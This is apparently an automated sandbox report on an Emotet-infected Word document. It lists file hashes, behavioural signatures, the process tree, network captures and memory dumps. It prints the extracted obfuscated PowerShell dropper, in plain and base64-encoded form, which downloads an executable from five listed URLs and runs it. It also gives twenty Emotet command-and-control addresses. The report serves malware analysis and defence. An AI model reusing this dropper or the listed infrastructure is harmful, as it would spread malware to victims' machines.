Analysis

  • max time kernel
    150s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    29-07-2020 01:44

General

  • Target

    emotet_e1_2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5_2020-07-29__014446._doc.doc

  • Size

    172KB

  • MD5

    178a5f6daf5e23231856627d16dfcbff

  • SHA1

    cfb6eeda8a907bb64b27a39692acc15e93560425

  • SHA256

    2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5

  • SHA512

    5c299c4ba5f27710a0dc7ad05d5010d8995ec9c0d0f2fe373772138068dfcce3cf32bbb4d40e4eaf30ff56495044ee05f5db7835ada6fb6a8908b2f79ad36da3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
1
$NBMXIjmb='HCFBYkkt';[Net.ServicePointManager]::"Se`cURIty`p`RoToCOL" = 'tls12, tls11, tls';$IWCMLuhh = '45';$FOLWJseo='PIJHSmun';$PORWJpxj=$env:userprofile+'\'+$IWCMLuhh+'.exe';$SGHJHcqg='GYRBRthc';$RFEFYcip=.('new-ob'+'j'+'ec'+'t') NEt.WebclIent;$BXAUSenl='http://arizonaonsale.com/cgi-bin/VuM64/*https://www.compednet.com/wp-content/Nv55027/*http://eltallerartistico.com/language/Uybj0/*http://classicpaint.net/wp-content/tVS1/*http://closhlab.com/OWN/lUvYIzLMa/'."S`plIt"([char]42);$CEDEDvom='XVNODxeb';foreach($BTEOZcho in $BXAUSenl){try{$RFEFYcip."dOWN`lo`A`dfiLE"($BTEOZcho, $PORWJpxj);$TVGIGdmy='FNQQZplr';If ((.('Ge'+'t-It'+'em') $PORWJpxj)."Len`gTh" -ge 26495) {([wmiclass]'win32_Process')."c`REAte"($PORWJpxj);$NDMVVysk='SUUXQzog';break;$TYZRFejz='HVXDLocn'}}catch{}}$GALKNsug='LPZQLjpy'
URLs
exe.dropper

http://arizonaonsale.com/cgi-bin/VuM64/

exe.dropper

https://www.compednet.com/wp-content/Nv55027/

exe.dropper

http://eltallerartistico.com/language/Uybj0/

exe.dropper

http://classicpaint.net/wp-content/tVS1/

exe.dropper

http://closhlab.com/OWN/lUvYIzLMa/

Extracted

Family

emotet

C2

179.60.229.168:443

185.94.252.13:443

189.218.165.63:80

77.90.136.129:8080

217.199.160.224:7080

104.131.41.185:8080

2.47.112.152:80

185.94.252.27:443

186.250.52.226:8080

51.255.165.160:8080

68.183.170.114:8080

191.99.160.58:80

104.131.103.37:8080

181.31.211.181:80

202.62.39.111:80

83.169.21.32:7080

87.106.46.107:8080

72.47.248.48:7080

177.75.143.112:443

190.17.195.202:80

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6
3
uS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz
4
6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 2 IoCs

    Detects Emotet payload in memory.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_2d0a5eef7407bd0f934ef9ad2782e437c5cdb55e31e66384e6442d82cf7735c5_2020-07-29__014446._doc.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1436
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABOAEIATQBYAEkAagBtAGIAPQAnAEgAQwBGAEIAWQBrAGsAdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBJAHQAeQBgAHAAYABSAG8AVABvAEMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQASQBXAEMATQBMAHUAaABoACAAPQAgACcANAA1ACcAOwAkAEYATwBMAFcASgBzAGUAbwA9ACcAUABJAEoASABTAG0AdQBuACcAOwAkAFAATwBSAFcASgBwAHgAagA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQBXAEMATQBMAHUAaABoACsAJwAuAGUAeABlACcAOwAkAFMARwBIAEoASABjAHEAZwA9ACcARwBZAFIAQgBSAHQAaABjACcAOwAkAFIARgBFAEYAWQBjAGkAcAA9AC4AKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgBXAGUAYgBjAGwASQBlAG4AdAA7ACQAQgBYAEEAVQBTAGUAbgBsAD0AJwBoAHQAdABwADoALwAvAGEAcgBpAHoAbwBuAGEAbwBuAHMAYQBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBWAHUATQA2ADQALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAbwBtAHAAZQBkAG4AZQB0AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgB2ADUANQAwADIANwAvACoAaAB0AHQAcAA6AC8ALwBlAGwAdABhAGwAbABlAHIAYQByAHQAaQBzAHQAaQBjAG8ALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAFUAeQBiAGoAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGwAYQBzAHMAaQBjAHAAYQBpAG4AdAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAVgBTADEALwAqAGgAdAB0AHAAOgAvAC8AYwBsAG8AcwBoAGwAYQBiAC4AYwBvAG0ALwBPAFcATgAvAGwAVQB2AFkASQB6AEwATQBhAC8AJwAuACIAUwBgAHAAbABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABDAEUARABFAEQAdgBvAG0APQAnAFgAVgBOAE8ARAB4AGUAYgAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgBUAEUATwBaAGMAaABvACAAaQBuACAAJABCAFgAQQBVAFMAZQBuAGwAKQB7AHQAcgB5AHsAJABSAEYARQBGAFkAYwBpAHAALgAiAGQATwBXAE4AYABsAG8AYABBAGAAZABmAGkATABFACIAKAAkAEIAVABFAE8AWgBjAGgAbwAsACAAJABQAE8AUgBXAEoAcAB4AGoAKQA7ACQAVABWAEcASQBHAGQAbQB5AD0AJwBGAE4AUQBRAFoAcABsAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABQAE8AUgBXAEoAcAB4AGoAKQAuACIATABlAG4AYABnAFQAaAAiACAALQBnAGUAIAAyADYANAA5ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAQQB0AGUAIgAoACQAUABPAFIAVwBKAHAAeABqACkAOwAkAE4ARABNAFYAVgB5AHMAawA9ACcAUwBVAFUAWABRAHoAbwBnACcAOwBiAHIAZQBhAGsAOwAkAFQAWQBaAFIARgBlAGoAegA9ACcASABWAFgARABMAG8AYwBuACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAQQBMAEsATgBzAHUAZwA9ACcATABQAFoAUQBMAGoAcAB5ACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1740
  • C:\Users\Admin\45.exe
    C:\Users\Admin\45.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1808
    • C:\Windows\SysWOW64\msports\DWrite.exe
      "C:\Windows\SysWOW64\msports\DWrite.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1344

Network

  • flag-unknown
    DNS
    arizonaonsale.com
    Remote address:
    8.8.8.8:53
    Request
    arizonaonsale.com
    IN A
    Response
    arizonaonsale.com
    IN A
    174.79.51.34
  • flag-unknown
    GET
    http://arizonaonsale.com/cgi-bin/VuM64/
    powersheLL.exe
    Remote address:
    174.79.51.34:80
    Request
    GET /cgi-bin/VuM64/ HTTP/1.1
    Host: arizonaonsale.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 29 Jul 2020 01:45:15 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Wed, 29 Jul 2020 01:45:15 GMT
    Content-Disposition: attachment; filename="Fx8JncB.exe"
    Content-Transfer-Encoding: binary
    Set-Cookie: 5f20d4ab86ad8=1595987115; expires=Wed, 29-Jul-2020 01:46:15 GMT; Max-Age=60; path=/
    Last-Modified: Wed, 29 Jul 2020 01:45:15 GMT
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: application/octet-stream
  • flag-unknown
    POST
    http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/
    DWrite.exe
    Remote address:
    185.94.252.13:443
    Request
    POST /kNfgDg/smXMaK/ZIU5I/ HTTP/1.1
    Referer: http://185.94.252.13/kNfgDg/smXMaK/ZIU5I/
    Content-Type: multipart/form-data; boundary=---------------------------282305612112810
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 185.94.252.13:443
    Content-Length: 4420
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 29 Jul 2020 01:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 174.79.51.34:80
    http://arizonaonsale.com/cgi-bin/VuM64/
    http
    powersheLL.exe
    12.1kB
    704.1kB
    257
    472

    HTTP Request

    GET http://arizonaonsale.com/cgi-bin/VuM64/

    HTTP Response

    200
  • 179.60.229.168:443
    DWrite.exe
    152 B
    120 B
    3
    3
  • 179.60.229.168:443
    DWrite.exe
    152 B
    120 B
    3
    3
  • 185.94.252.13:443
    http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/
    http
    DWrite.exe
    5.3kB
    908 B
    10
    8

    HTTP Request

    POST http://185.94.252.13:443/kNfgDg/smXMaK/ZIU5I/

    HTTP Response

    200
  • 224.0.0.252:5355
    100 B
    2
  • 8.8.8.8:53
    arizonaonsale.com
    dns
    63 B
    79 B
    1
    1

    DNS Request

    arizonaonsale.com

    DNS Response

    174.79.51.34

  • 224.0.0.252:5355
    100 B
    2

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1344-15-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/1436-2-0x0000000008980000-0x0000000008984000-memory.dmp

    Filesize

    16KB

  • memory/1436-4-0x0000000006F60000-0x0000000007160000-memory.dmp

    Filesize

    2.0MB

  • memory/1436-5-0x000000000AE30000-0x000000000AE34000-memory.dmp

    Filesize

    16KB

  • memory/1436-6-0x000000000BEB0000-0x000000000BEB4000-memory.dmp

    Filesize

    16KB

  • memory/1436-9-0x0000000002100000-0x0000000002101000-memory.dmp

    Filesize

    4KB

  • memory/1808-12-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.